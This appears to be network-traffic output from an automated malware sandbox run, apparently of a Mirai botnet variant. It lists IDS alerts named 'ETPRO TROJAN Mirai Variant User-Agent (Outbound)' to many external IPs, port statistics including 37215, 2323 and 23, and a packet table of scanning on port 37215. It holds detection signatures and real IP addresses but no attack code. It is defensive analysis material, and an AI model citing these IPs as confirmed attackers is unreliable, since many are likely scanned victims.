                                                      192.168.2.1595.101.14.3748976802839471 02/14/24-09:30:24.696063TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4897680192.168.2.1595.101.14.37
                                                      192.168.2.1595.46.0.15657584802839471 02/14/24-09:31:16.887660TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5758480192.168.2.1595.46.0.156
                                                      192.168.2.1595.100.231.12333398802839471 02/14/24-09:30:24.256489TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3339880192.168.2.1595.100.231.123
                                                      192.168.2.1595.101.175.21351674802839471 02/14/24-09:30:50.097654TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5167480192.168.2.1595.101.175.213
                                                      192.168.2.15112.126.91.17755850802839471 02/14/24-09:29:13.338241TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5585080192.168.2.15112.126.91.177
                                                      192.168.2.15112.74.59.15052534802839471 02/14/24-09:29:00.651651TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5253480192.168.2.15112.74.59.150
                                                      192.168.2.1595.100.205.13259690802839471 02/14/24-09:30:43.758353TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5969080192.168.2.1595.100.205.132
                                                      192.168.2.15112.74.127.16356520802839471 02/14/24-09:31:14.865359TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5652080192.168.2.15112.74.127.163
                                                      192.168.2.15112.167.233.639906802839471 02/14/24-09:29:22.020632TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3990680192.168.2.15112.167.233.6
                                                      192.168.2.15112.85.242.20144188802839471 02/14/24-09:30:08.929550TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4418880192.168.2.15112.85.242.201
                                                      192.168.2.1588.99.179.5658608802839471 02/14/24-09:29:33.638348TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5860880192.168.2.1588.99.179.56
                                                      192.168.2.1595.100.105.18943004802839471 02/14/24-09:29:08.720880TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4300480192.168.2.1595.100.105.189
                                                      192.168.2.1595.111.254.5749402802839471 02/14/24-09:29:56.727571TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4940280192.168.2.1595.111.254.57
                                                      192.168.2.1595.168.249.2636194802839471 02/14/24-09:29:33.449356TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3619480192.168.2.1595.168.249.26
                                                      192.168.2.1588.212.218.1837846802839471 02/14/24-09:30:19.189345TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3784680192.168.2.1588.212.218.18
                                                      192.168.2.1595.217.80.17439124802839471 02/14/24-09:29:42.740948TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3912480192.168.2.1595.217.80.174
                                                      192.168.2.1595.128.129.6141502802839471 02/14/24-09:29:33.421569TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4150280192.168.2.1595.128.129.61
                                                      192.168.2.15112.192.19.9746576802839471 02/14/24-09:29:48.420063TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4657680192.168.2.15112.192.19.97
                                                      192.168.2.1595.68.75.4935480802839471 02/14/24-09:30:11.639631TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3548080192.168.2.1595.68.75.49
                                                      192.168.2.15112.216.115.5034804802839471 02/14/24-09:29:14.015912TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3480480192.168.2.15112.216.115.50
                                                      192.168.2.1595.100.5.12358368802839471 02/14/24-09:29:19.170435TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5836880192.168.2.1595.100.5.123
                                                      192.168.2.1595.216.240.14335680802839471 02/14/24-09:29:24.661179TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3568080192.168.2.1595.216.240.143
                                                      192.168.2.1595.58.72.21538812802839471 02/14/24-09:30:59.762543TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3881280192.168.2.1595.58.72.215
                                                      192.168.2.1595.86.81.6052832802839471 02/14/24-09:30:48.149472TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5283280192.168.2.1595.86.81.60
                                                      192.168.2.1595.35.40.9057198802839471 02/14/24-09:28:56.307430TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5719880192.168.2.1595.35.40.90
                                                      192.168.2.1588.147.150.4442840802839471 02/14/24-09:30:08.412746TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4284080192.168.2.1588.147.150.44
                                                      192.168.2.1595.80.219.17451486802839471 02/14/24-09:29:56.726004TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5148680192.168.2.1595.80.219.174
                                                      192.168.2.1588.221.100.24851888802839471 02/14/24-09:30:03.422935TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5188880192.168.2.1588.221.100.248
                                                      192.168.2.15112.124.32.5657990802839471 02/14/24-09:30:04.967124TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5799080192.168.2.15112.124.32.56
                                                      192.168.2.1588.221.4.17653670802839471 02/14/24-09:30:26.259209TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5367080192.168.2.1588.221.4.176
                                                      192.168.2.15112.47.11.21053612802839471 02/14/24-09:29:05.762313TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5361280192.168.2.15112.47.11.210
                                                      192.168.2.1595.66.132.1335420802839471 02/14/24-09:29:42.765276TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3542080192.168.2.1595.66.132.13
                                                      192.168.2.1595.79.100.4034114802839471 02/14/24-09:30:14.762774TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3411480192.168.2.1595.79.100.40
                                                      192.168.2.1588.149.181.11556704802839471 02/14/24-09:28:46.591603TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5670480192.168.2.1588.149.181.115
                                                      192.168.2.1595.67.8.23960210802839471 02/14/24-09:30:06.552746TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6021080192.168.2.1595.67.8.239
                                                      192.168.2.1595.100.226.5242386802839471 02/14/24-09:30:24.466282TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4238680192.168.2.1595.100.226.52
                                                      192.168.2.1595.100.182.22458762802839471 02/14/24-09:29:24.857767TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5876280192.168.2.1595.100.182.224
                                                      192.168.2.1588.203.250.10053678802839471 02/14/24-09:29:44.339565TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5367880192.168.2.1588.203.250.100
                                                      192.168.2.1595.216.124.14643754802839471 02/14/24-09:30:48.383690TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4375480192.168.2.1595.216.124.146
                                                      192.168.2.1595.217.133.22457376802839471 02/14/24-09:29:38.541946TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5737680192.168.2.1595.217.133.224
                                                      192.168.2.1588.119.167.11553226802839471 02/14/24-09:28:46.591804TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5322680192.168.2.1588.119.167.115
                                                      192.168.2.1595.85.71.19159590802839471 02/14/24-09:29:24.925955TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5959080192.168.2.1595.85.71.191
                                                      192.168.2.1595.110.208.13752208802839471 02/14/24-09:29:56.739664TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5220880192.168.2.1595.110.208.137
                                                      192.168.2.1595.138.144.21753080802839471 02/14/24-09:30:19.384540TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5308080192.168.2.1595.138.144.217
                                                      192.168.2.15112.196.74.19359552802839471 02/14/24-09:29:03.444660TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5955280192.168.2.15112.196.74.193
                                                      192.168.2.15112.83.36.6245418802839471 02/14/24-09:30:36.980156TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4541880192.168.2.15112.83.36.62
                                                      192.168.2.1588.198.144.14234420802839471 02/14/24-09:30:26.486090TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3442080192.168.2.1588.198.144.142
                                                      192.168.2.1595.79.101.5458964802839471 02/14/24-09:29:09.728994TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5896480192.168.2.1595.79.101.54
                                                      192.168.2.15112.168.50.10039236802839471 02/14/24-09:29:03.691469TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3923680192.168.2.15112.168.50.100
                                                      192.168.2.1595.59.50.1939022802839471 02/14/24-09:29:38.813057TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3902280192.168.2.1595.59.50.19
                                                      192.168.2.1595.211.212.4053772802839471 02/14/24-09:30:59.478488TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5377280192.168.2.1595.211.212.40
                                                      192.168.2.1595.216.160.15060372802839471 02/14/24-09:29:35.305382TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6037280192.168.2.1595.216.160.150
                                                      192.168.2.1595.101.175.21351628802839471 02/14/24-09:30:48.297254TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5162880192.168.2.1595.101.175.213
                                                      192.168.2.1595.100.191.24239406802839471 02/14/24-09:30:59.704532TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3940680192.168.2.1595.100.191.242
                                                      192.168.2.1595.100.185.3740624802839471 02/14/24-09:29:15.215315TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4062480192.168.2.1595.100.185.37
                                                      192.168.2.1595.216.115.16842972802839471 02/14/24-09:30:48.373876TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4297280192.168.2.1595.216.115.168
                                                      192.168.2.1595.216.93.4944210802839471 02/14/24-09:29:24.436194TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4421080192.168.2.1595.216.93.49
                                                      192.168.2.1595.216.154.22659490802839471 02/14/24-09:30:41.261433TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5949080192.168.2.1595.216.154.226
                                                      192.168.2.1595.79.31.24633940802839471 02/14/24-09:30:53.704867TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3394080192.168.2.1595.79.31.246
                                                      192.168.2.1595.215.242.2152620802839471 02/14/24-09:28:47.609966TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5262080192.168.2.1595.215.242.21
                                                      192.168.2.1595.217.87.4746680802839471 02/14/24-09:29:38.542183TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4668080192.168.2.1595.217.87.47
                                                      192.168.2.1595.169.26.22634884802839471 02/14/24-09:30:33.911087TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3488480192.168.2.1595.169.26.226
                                                      192.168.2.15112.213.39.9534188802839471 02/14/24-09:29:27.776716TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3418880192.168.2.15112.213.39.95
                                                      192.168.2.1588.32.110.17057918802839471 02/14/24-09:29:42.295082TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5791880192.168.2.1588.32.110.170
                                                      192.168.2.1595.58.194.5851742802839471 02/14/24-09:30:10.328928TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5174280192.168.2.1595.58.194.58
                                                      192.168.2.15112.30.175.16553522802839471 02/14/24-09:29:03.417771TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5352280192.168.2.15112.30.175.165
                                                      192.168.2.1588.221.127.19752636802839471 02/14/24-09:30:26.255701TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5263680192.168.2.1588.221.127.197
                                                      192.168.2.1595.142.35.9154212802839471 02/14/24-09:30:10.010975TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5421280192.168.2.1595.142.35.91
                                                      192.168.2.1595.221.199.10835078802839471 02/14/24-09:28:56.286077TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3507880192.168.2.1595.221.199.108
                                                      192.168.2.1595.43.238.15938722802839471 02/14/24-09:30:55.714628TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3872280192.168.2.1595.43.238.159
                                                      192.168.2.1595.68.46.23459204802839471 02/14/24-09:30:24.482803TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5920480192.168.2.1595.68.46.234
                                                      192.168.2.15112.197.165.13456052802839471 02/14/24-09:29:03.449616TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5605280192.168.2.15112.197.165.134
                                                      192.168.2.1595.86.112.12039662802839471 02/14/24-09:30:29.871939TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3966280192.168.2.1595.86.112.120
                                                      192.168.2.1595.216.208.20443462802839471 02/14/24-09:31:13.060820TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4346280192.168.2.1595.216.208.204
                                                      192.168.2.1595.217.236.4644412802839471 02/14/24-09:29:29.700847TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4441280192.168.2.1595.217.236.46
                                                      192.168.2.15112.171.185.10138516802839471 02/14/24-09:29:36.795584TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3851680192.168.2.15112.171.185.101
                                                      192.168.2.1595.86.111.17755042802839471 02/14/24-09:30:37.233959TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5504280192.168.2.1595.86.111.177
                                                      192.168.2.1588.96.62.21437116802839471 02/14/24-09:30:03.395436TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3711680192.168.2.1588.96.62.214
                                                      192.168.2.1595.78.232.11339258802839471 02/14/24-09:30:24.712098TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3925880192.168.2.1595.78.232.113
                                                      192.168.2.1595.165.230.1047848802839471 02/14/24-09:30:19.435955TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4784880192.168.2.1595.165.230.10
                                                      192.168.2.15112.135.211.25543794802839471 02/14/24-09:28:47.121988TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4379480192.168.2.15112.135.211.255
                                                      192.168.2.15112.158.120.20859996802839471 02/14/24-09:31:09.292148TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5999680192.168.2.15112.158.120.208
                                                      192.168.2.1595.0.98.8853598802839471 02/14/24-09:29:56.976905TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5359880192.168.2.1595.0.98.88
                                                      192.168.2.1588.99.29.24933758802839471 02/14/24-09:29:32.010329TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3375880192.168.2.1588.99.29.249
                                                      192.168.2.1595.85.26.1732844802839471 02/14/24-09:30:52.921987TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3284480192.168.2.1595.85.26.17
                                                      192.168.2.15112.90.95.7346424802839471 02/14/24-09:31:06.192447TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4642480192.168.2.15112.90.95.73
                                                      192.168.2.1595.165.139.21060806802839471 02/14/24-09:28:47.591618TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6080680192.168.2.1595.165.139.210
                                                      192.168.2.15112.90.88.9033838802839471 02/14/24-09:30:11.038672TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3383880192.168.2.15112.90.88.90
                                                      192.168.2.1588.198.38.7944240802839471 02/14/24-09:30:31.340101TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4424080192.168.2.1588.198.38.79
                                                      192.168.2.1595.210.96.5533542802839471 02/14/24-09:29:24.411294TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3354280192.168.2.1595.210.96.55
                                                      192.168.2.15112.177.57.839686802839471 02/14/24-09:29:48.325813TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3968680192.168.2.15112.177.57.8
                                                      192.168.2.1595.216.30.5058040802839471 02/14/24-09:30:14.753452TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5804080192.168.2.1595.216.30.50
                                                      192.168.2.1595.216.41.5258672802839471 02/14/24-09:30:19.416264TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5867280192.168.2.1595.216.41.52
                                                      192.168.2.1595.100.149.4249860802839471 02/14/24-09:31:17.899931TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4986080192.168.2.1595.100.149.42
                                                      192.168.2.1595.100.203.6955932802839471 02/14/24-09:28:56.038983TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5593280192.168.2.1595.100.203.69
                                                      192.168.2.1595.216.140.6458794802839471 02/14/24-09:29:42.743456TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5879480192.168.2.1595.216.140.64
                                                      192.168.2.1588.221.78.21058378802839471 02/14/24-09:28:46.581700TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5837880192.168.2.1588.221.78.210
                                                      192.168.2.15112.124.165.10839986802839471 02/14/24-09:29:54.239906TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3998680192.168.2.15112.124.165.108
                                                      192.168.2.1595.111.242.7943940802839471 02/14/24-09:30:19.400442TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4394080192.168.2.1595.111.242.79
                                                      192.168.2.1588.249.66.4644304802839471 02/14/24-09:30:19.848334TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4430480192.168.2.1588.249.66.46
                                                      192.168.2.1595.101.78.6946436802839471 02/14/24-09:30:14.535525TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4643680192.168.2.1595.101.78.69
                                                      192.168.2.1595.174.28.16435644802839471 02/14/24-09:30:37.193511TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3564480192.168.2.1595.174.28.164
                                                      192.168.2.1595.216.173.12433430802839471 02/14/24-09:29:15.246798TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3343080192.168.2.1595.216.173.124
                                                      192.168.2.15112.13.121.10151742802839471 02/14/24-09:30:03.594758TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5174280192.168.2.15112.13.121.101
                                                      192.168.2.15112.197.81.18759498802839471 02/14/24-09:29:48.436887TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5949880192.168.2.15112.197.81.187
                                                      192.168.2.1595.86.125.19951396802839471 02/14/24-09:30:59.785772TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5139680192.168.2.1595.86.125.199
                                                      192.168.2.1595.56.209.4359496802839471 02/14/24-09:29:15.309796TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5949680192.168.2.1595.56.209.43
                                                      192.168.2.15112.168.102.2948300802839471 02/14/24-09:29:26.534411TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4830080192.168.2.15112.168.102.29
                                                      192.168.2.1595.179.193.10038656802839471 02/14/24-09:30:11.612228TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3865680192.168.2.1595.179.193.100
                                                      192.168.2.1595.100.66.16658512802839471 02/14/24-09:30:59.454642TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5851280192.168.2.1595.100.66.166
                                                      192.168.2.1595.47.167.6552484802839471 02/14/24-09:28:47.589849TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5248480192.168.2.1595.47.167.65
                                                      192.168.2.1588.147.5.6334948802839471 02/14/24-09:29:15.554778TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3494880192.168.2.1588.147.5.63
                                                      192.168.2.1588.10.162.1247362802839471 02/14/24-09:29:38.317134TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4736280192.168.2.1588.10.162.12
                                                      192.168.2.1595.100.136.4034484802839471 02/14/24-09:29:56.539233TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3448480192.168.2.1595.100.136.40
                                                      192.168.2.1588.221.34.1853612802839471 02/14/24-09:30:21.250100TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5361280192.168.2.1588.221.34.18
                                                      192.168.2.1595.101.201.14860120802839471 02/14/24-09:28:47.570065TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6012080192.168.2.1595.101.201.148
                                                      192.168.2.15112.83.37.17739940802839471 02/14/24-09:30:16.369828TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3994080192.168.2.15112.83.37.177
                                                      192.168.2.1595.57.108.5152274802839471 02/14/24-09:29:09.207734TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5227480192.168.2.1595.57.108.51
                                                      192.168.2.1588.221.37.3152232802839471 02/14/24-09:30:43.927469TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5223280192.168.2.1588.221.37.31
                                                      192.168.2.15112.25.57.4354648802839471 02/14/24-09:31:01.795046TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5464880192.168.2.15112.25.57.43
                                                      192.168.2.15112.175.243.5660060802839471 02/14/24-09:28:47.077014TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6006080192.168.2.15112.175.243.56
                                                      192.168.2.1595.163.217.7343390802839471 02/14/24-09:30:19.421156TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4339080192.168.2.1595.163.217.73
                                                      192.168.2.1595.214.134.4852658802839471 02/14/24-09:29:24.833034TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5265880192.168.2.1595.214.134.48
                                                      192.168.2.1595.153.45.13652326802839471 02/14/24-09:30:14.754813TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5232680192.168.2.1595.153.45.136
                                                      192.168.2.1595.101.188.3035808802839471 02/14/24-09:29:56.736509TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3580880192.168.2.1595.101.188.30
                                                      192.168.2.1595.158.24.6460290802839471 02/14/24-09:30:19.417837TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6029080192.168.2.1595.158.24.64
                                                      192.168.2.15112.221.133.9153166802839471 02/14/24-09:29:29.476153TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5316680192.168.2.15112.221.133.91
                                                      192.168.2.1595.170.92.2049376802839471 02/14/24-09:30:09.848136TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4937680192.168.2.1595.170.92.20
                                                      192.168.2.15112.186.69.7241012802839471 02/14/24-09:30:59.252865TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4101280192.168.2.15112.186.69.72
                                                      192.168.2.15112.29.170.23946436802839471 02/14/24-09:29:06.146720TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4643680192.168.2.15112.29.170.239
                                                      192.168.2.1595.170.66.22239634802839471 02/14/24-09:30:41.244571TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3963480192.168.2.1595.170.66.222
                                                      192.168.2.15112.198.55.12144878802839471 02/14/24-09:29:29.505273TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4487880192.168.2.15112.198.55.121
                                                      192.168.2.1588.221.47.14555876802839471 02/14/24-09:29:33.666096TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5587680192.168.2.1588.221.47.145
                                                      192.168.2.1595.56.127.17951830802839471 02/14/24-09:29:19.093571TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5183080192.168.2.1595.56.127.179
                                                      192.168.2.1595.217.145.16549690802839471 02/14/24-09:29:47.818025TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4969080192.168.2.1595.217.145.165
                                                      192.168.2.1595.101.247.12743780802839471 02/14/24-09:29:51.437945TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4378080192.168.2.1595.101.247.127
                                                      192.168.2.15112.13.121.10151690802839471 02/14/24-09:30:04.630815TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5169080192.168.2.15112.13.121.101
                                                      192.168.2.1595.169.188.1737016802839471 02/14/24-09:31:13.059075TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3701680192.168.2.1595.169.188.17
                                                      192.168.2.1595.101.203.25038158802839471 02/14/24-09:30:09.850044TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3815880192.168.2.1595.101.203.250
                                                      192.168.2.1595.179.146.20359722802839471 02/14/24-09:30:44.413481TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5972280192.168.2.1595.179.146.203
                                                      192.168.2.1588.63.12.22350630802839471 02/14/24-09:30:00.971656TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5063080192.168.2.1588.63.12.223
                                                      192.168.2.1595.100.75.21356082802839471 02/14/24-09:30:31.540515TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5608280192.168.2.1595.100.75.213
                                                      192.168.2.15112.166.250.545294802839471 02/14/24-09:29:03.354973TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4529480192.168.2.15112.166.250.5
                                                      192.168.2.1588.218.158.21359262802839471 02/14/24-09:29:33.661619TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5926280192.168.2.1588.218.158.213
                                                      192.168.2.15112.186.20.3860010802839471 02/14/24-09:31:05.727048TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6001080192.168.2.15112.186.20.38
                                                      192.168.2.1595.101.220.17246160802839471 02/14/24-09:31:06.716395TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4616080192.168.2.1595.101.220.172
                                                      192.168.2.1588.99.64.8642730802839471 02/14/24-09:29:51.033750TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4273080192.168.2.1588.99.64.86
                                                      192.168.2.1595.163.53.16254374802839471 02/14/24-09:30:37.211438TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5437480192.168.2.1595.163.53.162
                                                      • Total Packets: 9447
                                                      • 37215 undefined
                                                      • 8080 undefined
                                                      • 2323 undefined
                                                      • 1024 undefined
                                                      • 80 (HTTP)
                                                      • 23 (Telnet)
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Feb 14, 2024 09:28:44.277666092 CET809637215192.168.2.15197.255.59.61
                                                      Feb 14, 2024 09:28:44.277753115 CET809637215192.168.2.15197.155.118.60
                                                      Feb 14, 2024 09:28:44.277785063 CET809637215192.168.2.15197.140.93.193
                                                      Feb 14, 2024 09:28:44.277837038 CET809637215192.168.2.15197.94.36.228
                                                      Feb 14, 2024 09:28:44.277864933 CET809637215192.168.2.15197.240.169.137
                                                      Feb 14, 2024 09:28:44.277879953 CET809637215192.168.2.15197.156.75.239
                                                      Feb 14, 2024 09:28:44.277883053 CET809637215192.168.2.15197.232.233.5
                                                      Feb 14, 2024 09:28:44.277884960 CET809637215192.168.2.15197.244.118.41
                                                      Feb 14, 2024 09:28:44.277889013 CET809637215192.168.2.15197.27.205.153
                                                      Feb 14, 2024 09:28:44.277918100 CET809637215192.168.2.15197.23.216.221
                                                      Feb 14, 2024 09:28:44.277935028 CET809637215192.168.2.15197.117.216.223
                                                      Feb 14, 2024 09:28:44.277935028 CET809637215192.168.2.15197.9.175.108
                                                      Feb 14, 2024 09:28:44.277954102 CET809637215192.168.2.15197.11.210.121
                                                      Feb 14, 2024 09:28:44.277995110 CET809637215192.168.2.15197.190.121.11
                                                      Feb 14, 2024 09:28:44.278007984 CET809637215192.168.2.15197.123.46.241
                                                      Feb 14, 2024 09:28:44.278328896 CET809637215192.168.2.15197.146.53.46
                                                      Feb 14, 2024 09:28:44.278337955 CET809637215192.168.2.15197.245.73.238
                                                      Feb 14, 2024 09:28:44.278465033 CET809637215192.168.2.15197.54.220.233
                                                      Feb 14, 2024 09:28:44.278465033 CET809637215192.168.2.15197.224.124.198
                                                      Feb 14, 2024 09:28:44.278475046 CET809637215192.168.2.15197.247.131.106
                                                      Feb 14, 2024 09:28:44.278490067 CET809637215192.168.2.15197.51.193.179
                                                      Feb 14, 2024 09:28:44.278507948 CET809637215192.168.2.15197.185.2.78
                                                      Feb 14, 2024 09:28:44.278539896 CET809637215192.168.2.15197.39.182.12
                                                      Feb 14, 2024 09:28:44.278558969 CET809637215192.168.2.15197.86.193.36
                                                      Feb 14, 2024 09:28:44.278666973 CET809637215192.168.2.15197.100.199.92
                                                      Feb 14, 2024 09:28:44.278671026 CET809637215192.168.2.15197.242.100.146
                                                      Feb 14, 2024 09:28:44.278671026 CET809637215192.168.2.15197.240.50.107
                                                      Feb 14, 2024 09:28:44.278683901 CET809637215192.168.2.15197.253.178.177
                                                      Feb 14, 2024 09:28:44.278717995 CET809637215192.168.2.15197.163.48.77
                                                      Feb 14, 2024 09:28:44.279241085 CET809637215192.168.2.15197.200.161.248
                                                      Feb 14, 2024 09:28:44.279248953 CET809637215192.168.2.15197.30.150.205
                                                      Feb 14, 2024 09:28:44.279248953 CET809637215192.168.2.15197.145.155.228
                                                      Feb 14, 2024 09:28:44.279253006 CET809637215192.168.2.15197.181.142.56
                                                      Feb 14, 2024 09:28:44.279270887 CET809637215192.168.2.15197.66.175.231
                                                      Feb 14, 2024 09:28:44.279285908 CET809637215192.168.2.15197.40.202.138
